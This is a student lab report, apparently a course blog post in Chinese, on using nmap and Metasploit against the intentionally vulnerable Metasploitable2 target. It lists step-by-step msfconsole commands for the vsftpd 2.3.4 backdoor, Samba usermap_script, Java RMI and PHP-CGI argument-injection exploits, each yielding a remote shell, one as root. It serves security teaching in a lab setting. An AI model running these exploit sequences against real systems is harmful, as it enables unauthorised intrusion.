20232420 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

本实践目标是掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。
1)前期渗透
2)21端口利用Vsftpd源码包后门漏洞
3)139端口利用SambaMS-RPC Shell命令注入漏洞
4)1099端口利用Java RMI SERVER命令执行漏洞
5)80端口利用PHP CGI参数执行注入漏洞

2.实验过程

下载官方靶机Metasploitable2 ,完成实验内容。
Metasploitable2下载地址
默认登录名和密码为msfadmin;msfadmin。

2.1前期渗透

在靶机中使用ifconfig得到ip地址为192.168.50.145。

屏幕截图 2025-11-20 212025

在kali中切换到root用户下打开msfconsole,输入以下命令扫描网段。

search arp_sweep
use 0
set RHOSTS 192.168.50.0/24
run

屏幕截图 2025-11-20 212800

扫描结果显示,靶机(192.168.50.145)处于在线状态,(VMware, Inc.)表示这是一台VMware虚拟机。

屏幕截图 2025-11-20 213054

在命令行中输入nmap -p 1-2048 192.168.50.145查看靶机开放的端口。

屏幕截图 2025-11-20 213208

在命令行中输入nmap -script=vuln 192.168.50.145对靶机的漏洞进行扫描。这个靶机有很多漏洞,选取一部分有明确提示的,如21端口有vsFTPd漏洞,1099端口有RMI registry default configuration remote code execution漏洞。

屏幕截图 2025-11-20 213931

屏幕截图 2025-11-20 214048

2.2 Vsftpd源码包后门漏洞(21端口)

msfconsole中输入以下命令。

use exploit/unix/ftp/vsftpd_234_backdoor #利用vsftpd 2.3.4版本中被恶意植入的后门
set RHOSTS 192.168.50.145
run

再输入uname –apwdid等命令,可以看到已成功获取靶机的shell。

屏幕截图 2025-11-21 154710

2.3 SambaMS-RPC Shell命令注入漏洞(139端口)

msfconsole中输入以下命令。

use exploit/multi/samba/usermap_script #利用Samba服务的usermap_script配置漏洞
set RHOST 192.168.50.145
exploit

再输入uname -a命令,可以看到已成功获取靶机的shell。

屏幕截图 2025-11-21 154105

2.4 Java RMI SERVER命令执行漏洞(1099端口)

通过命令nmap -p 1099 192.168.50.145扫描靶机的1099端口,可以看到1099端口开放。

屏幕截图 2025-11-21 155127

msfconsole中输入以下命令。

use exploit/multi/misc/java_rmi_server #利用Java RMI服务中的漏洞
set RHOST 192.168.50.145
exploit
shell

输入命令whoami,得到结果root,说明攻击成功。

屏幕截图 2025-11-21 155301

2.5 PHP CGI参数执行注入漏洞(80端口)

msfconsole中输入以下命令。

use exploit/multi/http/php_cgi_arg_injection #利用的是PHP-CGI模式下的参数注入漏洞
set RHOST 192.168.50.145
exploit
shell

再输入uname -a命令,可以看到已成功获取靶机的shell。

屏幕截图 2025-11-21 155820

3.问题及解决方案

问题1:前期渗透中,打开msfconsole,执行ARP扫描,输入run试图运行时,被提示“不允许的操作”。

屏幕截图 2025-11-20 212326

问题1解决方案:权限不够,切换到root用户再尝试一次,扫描成功。

屏幕截图 2025-11-20 212800

4.学习感悟、思考等

本次实验从使用nmap、msfconsole对靶机进行扫描,到msfconsole搜索并加载漏洞模块、配置目标IP、执行攻击,再到验证攻击结果,实践了完整的漏洞利用操作,使我深刻感受到了nmap和msfconsole两款工具的作用。通过这些渗透测试工具,我们可以迅速发现不同类型的漏洞,并快速找到对应的攻击模块并利用。
实验也深化我了对网络安全的认知,直观感受到配置不当、版本漏洞、代码缺陷等因素带来的安全风险。一定要及时更新服务版本、禁用不必要的服务与端口,这些基础措施能大幅降低被攻击的概率,是网络安全防护的重中之重。

posted @ 2025-11-21 16:40  20232420刘镇瑜  阅读(3)  评论(0)    收藏  举报